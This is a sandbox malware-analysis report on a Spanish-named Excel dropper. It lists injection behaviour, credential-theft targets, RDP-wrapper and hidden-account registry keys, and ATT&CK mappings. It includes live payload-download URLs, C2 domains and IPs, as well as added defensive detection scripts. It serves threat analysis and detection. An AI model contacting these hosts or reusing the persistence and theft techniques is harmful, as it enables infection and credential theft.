Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe VolumeInformation
Source: C:\ProgramData\msimages.exe | Queries volume information: C:\ProgramData\msimages.exe VolumeInformation
Source: C:\ProgramData\msimages.exe | Queries volume information: C:\ProgramData\msimages.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040882F: GetModuleHandleA, SHGetFolderPathW, lstrcatW, lstrcatW, GetLocalTime, wsprintfW, lstrcatW, CreateFileW, CloseHandle, GetMessageA, TranslateMessage, DispatchMessageA, GetMessageA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
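The process-create and memory-write rows above show the same shape for both droppers: each binary spawns a copy of itself, and a PE header (4D5A) is then written at base 400000 inside that copy, with CreateRemoteThread / NtSetContextThread resolved for the hand-off. That self-spawn followed by a remote thread from the parent is the hollowing tell an endpoint rule can key on. The code below is an added example and is not part of the report or of the sample; it correlates Sysmon-style EventID 1 (process create) and EventID 8 (CreateRemoteThread) records. The event records, PIDs, timestamps, the thread start address, the Office parent list and the 30-second window are all constructed assumptions.

```python
"""Correlate process-create (EventID 1) and CreateRemoteThread (EventID 8)
records into the self-spawn + remote-thread pattern.

All telemetry below is constructed for this example; it is not taken from
the sandbox report. PIDs, times and the start address are illustrative only.
"""
from datetime import datetime, timedelta

VPZ = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"  # benign control

# Office binaries whose direct .exe children are suspicious (assumed list).
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# A remote thread must follow the child's creation within this window (assumed).
WINDOW = timedelta(seconds=30)

EVENTS = [  # constructed sample telemetry, Sysmon field names abbreviated
    {"id": 1, "t": "2024-12-11T10:00:00", "pid": 3564, "ppid": 2000,
     "image": VPZ, "parent_image": EXCEL},
    {"id": 1, "t": "2024-12-11T10:00:02", "pid": 3600, "ppid": 3564,
     "image": VPZ, "parent_image": VPZ},
    {"id": 8, "t": "2024-12-11T10:00:03", "src_pid": 3564, "tgt_pid": 3600,
     "src_image": VPZ, "tgt_image": VPZ, "start_address": "0x0041C2A0"},
    # Chrome spawning a same-image renderer is normal and is not flagged.
    {"id": 1, "t": "2024-12-11T10:00:05", "pid": 4010, "ppid": 4000,
     "image": CHROME, "parent_image": CHROME},
    # A remote thread long after the spawn falls outside the window.
    {"id": 8, "t": "2024-12-11T10:05:00", "src_pid": 4000, "tgt_pid": 4010,
     "src_image": CHROME, "tgt_image": CHROME, "start_address": "0x7FF6A0001000"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _ts(s):
    return datetime.fromisoformat(s)


def find_self_injection(events):
    """Return findings as (rule, pid, detail) tuples, in event-time order."""
    procs = {}  # pid -> latest EventID 1 record, so PID reuse is handled
    findings = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["id"] == 1:
            procs[ev["pid"]] = ev
            if (_basename(ev["parent_image"]) in OFFICE_IMAGES
                    and ev["image"].lower().endswith(".exe")):
                findings.append(("office_spawned_exe", ev["pid"], ev["image"]))
        elif ev["id"] == 8:
            child = procs.get(ev["tgt_pid"])
            if child is None:
                continue
            same_image = _basename(child["image"]) == _basename(ev["src_image"])
            from_parent = child["ppid"] == ev["src_pid"]
            fresh = _ts(ev["t"]) - _ts(child["t"]) <= WINDOW
            if same_image and from_parent and fresh:
                findings.append(("self_injection", ev["tgt_pid"],
                                 f"{ev['src_pid']} -> {ev['tgt_pid']} "
                                 f"thread start {ev['start_address']}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in find_self_injection(EVENTS):
        print(f"{rule:20} pid={pid} {detail}")
```

The three conditions together (same image, the thread comes from the parent, and it arrives shortly after the spawn) keep ordinary same-image child processes such as browser renderers out of the result; drop any one of them and the rule becomes noisy.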

                Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10
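The msimages.exe memory dump carries the full RDP-wrapper and hidden-account string set (TermService ServiceDll, rfxvmt.dll, rdpwrap.ini, Winlogon\SpecialAccounts\UserList, fDenyTSConnections, EnableConcurrentSessions, AllowMultipleTSSessions), and the row above shows a WinINet MaxConnectionsPerServer change. Every one of these is a registry write, so they can be matched on SetValue telemetry. The code below is an added example, not taken from the report or from the sample: it scores Sysmon-style EventID 13 records (TargetObject, Details) against those locations. The account name svchelper, the rdpwrap.dll path, the benign control rows and the severities are assumptions made for the example.

```python
"""Score registry SetValue records (Sysmon EventID 13 style) against the
Terminal Server / hidden-account / RDP-wrapper locations used by the sample.

The events are constructed for this example, not taken from the report; the
account name 'svchelper' and the rdpwrap.dll path are invented.
"""
import re

SAMPLE_EVENTS = [  # (TargetObject, Details) as Sysmon renders them
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\svchelper",
     "DWORD (0x00000000)"),
    (r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "DWORD (0x00000000)"),
    (r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core\EnableConcurrentSessions",
     "DWORD (0x00000001)"),
    (r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     r"C:\ProgramData\rdpwrap.dll"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer",
     "DWORD (0x0000000A)"),
    # benign controls: the stock ServiceDll, and RDP left disabled
    (r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters\ServiceDll",
     r"%SystemRoot%\System32\termsrv.dll"),
    (r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "DWORD (0x00000001)"),
]


def dword(details):
    """Parse Sysmon's 'DWORD (0x...)' rendering; None for non-DWORD data."""
    m = re.fullmatch(r"DWORD \((0x[0-9A-Fa-f]+)\)", details)
    return int(m.group(1), 16) if m else None


def check_registry_event(target, details):
    """Return (severity, message) for one SetValue event, or None if benign."""
    key, _, value = target.rpartition("\\")
    key, vname, d = key.lower(), value.lower(), dword(details)
    # UserList\<name> = 0 removes <name> from the logon screen and user lists.
    if key.endswith(r"\winlogon\specialaccounts\userlist") and d == 0:
        return "high", f"account '{value}' hidden from the logon screen (UserList = 0)"
    # RDP Wrapper works by pointing TermService at its own DLL.
    if (key.endswith(r"\services\termservice\parameters") and vname == "servicedll"
            and not details.lower().endswith(r"\termsrv.dll")):
        return "high", f"TermService ServiceDll replaced: {details}"
    if (key.endswith(r"\control\terminal server")
            and vname == "fdenytsconnections" and d == 0):
        return "medium", "Remote Desktop connections enabled (fDenyTSConnections = 0)"
    if vname in ("enableconcurrentsessions", "allowmultipletssessions") and d == 1:
        return "medium", f"concurrent RDP sessions allowed ({value} = 1)"
    if key.endswith(r"\internet settings") and vname == "maxconnectionsperserver":
        return "low", f"WinINet MaxConnectionsPerServer raised to {d}"
    return None


def scan(events):
    """Run every event through the checks; keep only the hits."""
    hits = []
    for target, details in events:
        verdict = check_registry_event(target, details)
        if verdict:
            hits.append((verdict[0], verdict[1], target))
    return hits


if __name__ == "__main__":
    for severity, message, target in scan(SAMPLE_EVENTS):
        print(f"[{severity:6}] {message}\n         {target}")
```

The ServiceDll check is the one worth tuning first: the stock value points at termsrv.dll, so anything else under TermService\Parameters deserves a look even without the other signals, whereas fDenyTSConnections = 0 on its own is routine on administered hosts and only rises in severity in combination.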

                Stealing of Sensitive Information

Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040C1B2: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040C1B2: \Chromium\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040A29A: POP3 Password
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040A29A: SMTP Password
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040A29A: IMAP Password
Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: VPZVQXDUT.exe PID: 3564, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: VPZVQXDUT.exe PID: 3600, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msimages.exe PID: 3704, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msimages.exe PID: 3836, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic in the report's column order (Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The number in parentheses is the report's count for that technique; techniques without a number were not matched.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Scripting (42); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Native API (11); Exploitation for Client Execution (33); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Scripting (42); DLL Side-Loading (1); Create Account (1); Windows Service (1); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (1); Process Injection (321); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (2); DLL Side-Loading (1); Masquerading (3); Virtualization/Sandbox Evasion (41); Access Token Manipulation (1); Process Injection (321); Hidden Files and Directories (1); Hidden Users (1)
Credential Access: OS Credential Dumping (2); Input Capture (21); Credentials In Files (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (24); Security Software Discovery (2); Virtualization/Sandbox Evasion (41); Process Discovery (1); Remote System Discovery (1); Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Input Capture (21); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (23); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Endpoint Denial of Service (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1574073; Sample: Estado.de.cuenta.xls; Startdate: 12/12/2024; Architecture: WINDOWS; Score: 100

Root (node 2): dns.stipamana.com
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 22 other signatures
  Started: EXCEL.EXE (node 10; 8 23); msimages.exe (node 15)

EXCEL.EXE (node 10)
  Network: www.stipamana.com 94.156.167.55, 443, 49163 SARNICA-ASBG Bulgaria
  Dropped: C:\Users\user\AppData\...\VPZVQXDUT.exe, PE32; C:\Users\user\AppData\...\asxhfzdhhz[1].exe, PE32
  Signatures: Document exploit detected (creates forbidden files)
  Started: VPZVQXDUT.exe (node 17)

msimages.exe (node 15)
  Signatures: Contains functionality to hide user accounts; Injects a PE file into a foreign processes
  Started: msimages.exe (node 20; 1); msimages.exe (node 22)

VPZVQXDUT.exe (node 17)
  Signatures: Antivirus detection for dropped file; Contains functionality to hide user accounts; Machine Learning detection for dropped file; 4 other signatures
  Started: VPZVQXDUT.exe (node 24; 5 4); VPZVQXDUT.exe (node 28)

VPZVQXDUT.exe (node 24)
  Dropped: C:\ProgramData\msimages.exe, PE32
  Signatures: Contains functionality to hide user accounts; Increases the number of concurrent connection per server for Internet Explorer; Hides that the sample has been downloaded from the Internet (zone.identifier)
  Started: msimages.exe (node 30)

msimages.exe (node 30)
  Signatures: Antivirus detection for dropped file; Contains functionality to hide user accounts; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  Started: msimages.exe (node 33; 2); msimages.exe (node 36; 1)

msimages.exe (node 33)
  Network: dns.stipamana.com 87.120.121.160, 49164, 49165, 49166 UNACS-AS-BG8000BurgasBG Bulgaria

Initial sample
Source | Detection | Scanner | Label
Estado.de.cuenta.xls | 50% | ReversingLabs | Script-Macro.Downloader.Heuristic
Estado.de.cuenta.xls | 100% | Avira | HEUR/Macro.Downloader.MRDO.Gen
Estado.de.cuenta.xls | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\ProgramData\msimages.exe | 100% | Avira | HEUR/AGEN.1311032
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe | 100% | Avira | HEUR/AGEN.1311032
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | 100% | Avira | HEUR/AGEN.1311032
C:\ProgramData\msimages.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | 100% | Joe Sandbox ML |

No Antivirus matches

No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe | 100% | Avira URL Cloud | malware

Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dns.stipamana.com | 87.120.121.160 | true | false | | high
www.stipamana.com | 94.156.167.55 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
dns.stipamana.com | false | | high
https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe | true | Avira URL Cloud: malware | unknown

URLs from memory and binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/syohex/java-simple-mine-sweeperC: | VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/syohex/java-simple-mine-sweeper | VPZVQXDUT.exe | false | | high
Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
87.120.121.160 | dns.stipamana.com | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | false
94.156.167.55 | www.stipamana.com | Bulgaria | 48584 | SARNICA-ASBG | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574073
Start date and time: 2024-12-12 21:44:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Estado.de.cuenta.xls
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winXLS@18/5@73/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 71
• Number of non-executed functions: 99
Cookbook Comments:
• Found application associated with file extension: .xls
• Max analysis timeout: 600s exceeded, the analysis took too long
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Estado.de.cuenta.xls
Time | Type | Description
12:45:50 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run msimages C:\ProgramData\msimages.exe
15:45:43 | API Interceptor | 8x Sleep call for process: VPZVQXDUT.exe modified
15:45:46 | API Interceptor | 64028x Sleep call for process: msimages.exe modified
Related samples by IP (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
87.120.121.160 | tqkdMdv2zO.doc | malicious | XenoRAT |
87.120.121.160 | file.exe | malicious | AveMaria, UACMe |
87.120.121.160 | uRxH0oSpKL.exe | malicious | AveMaria, PrivateLoader, UACMe |
87.120.121.160 | Estado.de.cuenta.xls | malicious | AveMaria, UACMe |
87.120.121.160 | 38lQYJVIe9.exe | malicious | AveMaria, UACMe |
87.120.121.160 | XUhf3m5FmK.exe | malicious | XenoRAT |
87.120.121.160 | plb2ptcqcI.doc | malicious | XenoRAT |
87.120.121.160 | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT |
87.120.121.160 | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT |
87.120.121.160 | Transferencia.lnk | malicious | XenoRAT |
94.156.167.55 | gMqBZfJ5Mq.exe | malicious | Lokibot | www.stipamana.com/jedrshyyjdft/Panel/five/fre.php

Related samples by domain (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
www.stipamana.com | tqkdMdv2zO.doc | malicious | XenoRAT | 94.156.167.57
www.stipamana.com | gMqBZfJ5Mq.exe | malicious | Lokibot | 94.156.167.55
www.stipamana.com | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.55
www.stipamana.com | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.55
www.stipamana.com | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.55
www.stipamana.com | Estado_de_cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.57
www.stipamana.com | plb2ptcqcI.doc | malicious | XenoRAT | 94.156.167.57
www.stipamana.com | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 94.156.167.57
www.stipamana.com | TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown | 94.156.167.57
www.stipamana.com | TRANSFERENCIA COMPROBANTES.lnk | malicious | Unknown | 94.156.167.57
dns.stipamana.com | tqkdMdv2zO.doc | malicious | XenoRAT | 87.120.121.160
dns.stipamana.com | 33ZqRNeabp.exe | malicious | AveMaria, UACMe | 94.156.167.55
dns.stipamana.com | file.exe | malicious | AveMaria, UACMe | 87.120.121.160
dns.stipamana.com | uRxH0oSpKL.exe | malicious | AveMaria, PrivateLoader, UACMe | 87.120.121.160
dns.stipamana.com | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 87.120.121.160
dns.stipamana.com | 38lQYJVIe9.exe | malicious | AveMaria, UACMe | 87.120.121.160
dns.stipamana.com | XUhf3m5FmK.exe | malicious | XenoRAT | 87.120.121.160
dns.stipamana.com | plb2ptcqcI.doc | malicious | XenoRAT | 87.120.121.160
dns.stipamana.com | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 87.120.121.160
dns.stipamana.com | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 87.120.121.160

Related samples by ASN (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
SARNICA-ASBG | tqkdMdv2zO.doc | malicious | XenoRAT | 94.156.167.57
SARNICA-ASBG | 33ZqRNeabp.exe | malicious | AveMaria, UACMe | 94.156.167.55
SARNICA-ASBG | gMqBZfJ5Mq.exe | malicious | Lokibot | 94.156.167.55
SARNICA-ASBG | sbs9FC81oX.exe | malicious | Unknown | 31.13.224.16
SARNICA-ASBG | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.55
SARNICA-ASBG | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.55
SARNICA-ASBG | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.55
SARNICA-ASBG | Estado_de_cuenta.xls | malicious | AveMaria, UACMe | 94.156.167.57
SARNICA-ASBG | plb2ptcqcI.doc | malicious | XenoRAT | 94.156.167.57
SARNICA-ASBG | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT | 94.156.167.57
UNACS-AS-BG8000BurgasBG | https://0388net.cc | malicious | Unknown | 87.120.125.144
UNACS-AS-BG8000BurgasBG | https://0388net.cc | malicious | Unknown | 87.120.125.144
UNACS-AS-BG8000BurgasBG | tqkdMdv2zO.doc | malicious | XenoRAT | 87.120.121.160
UNACS-AS-BG8000BurgasBG | file.exe | malicious | AveMaria, UACMe | 87.120.121.160
UNACS-AS-BG8000BurgasBG | uRxH0oSpKL.exe | malicious | AveMaria, PrivateLoader, UACMe | 87.120.121.160
UNACS-AS-BG8000BurgasBG | Estado.de.cuenta.xls | malicious | AveMaria, UACMe | 87.120.121.160
UNACS-AS-BG8000BurgasBG | 38lQYJVIe9.exe | malicious | AveMaria, UACMe | 87.120.121.160
UNACS-AS-BG8000BurgasBG | c2.hta | malicious | XWorm | 87.120.117.152
UNACS-AS-BG8000BurgasBG | XUhf3m5FmK.exe | malicious | XenoRAT | 87.120.121.160
UNACS-AS-BG8000BurgasBG | plb2ptcqcI.doc | malicious | XenoRAT | 87.120.121.160

Related samples by dropped file (Match | Associated Sample Name / URL | Detection | Threat Name | Context)
7dcce5b76c8b17472d024758970a406b | SOA USD67,353.35.xla.xlsx | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | Euro confirmation Sp.xls | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | 510005940.docx.doc | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | Document.xla | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | xeroxscan.Docx | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | xeroxscan.Docx | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | invoice09850.xls | malicious | Remcos | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | Document.xla.xlsx | malicious | Unknown | 94.156.167.55
7dcce5b76c8b17472d024758970a406b | Invoice A037.xls | malicious | Unknown | 94.156.167.55
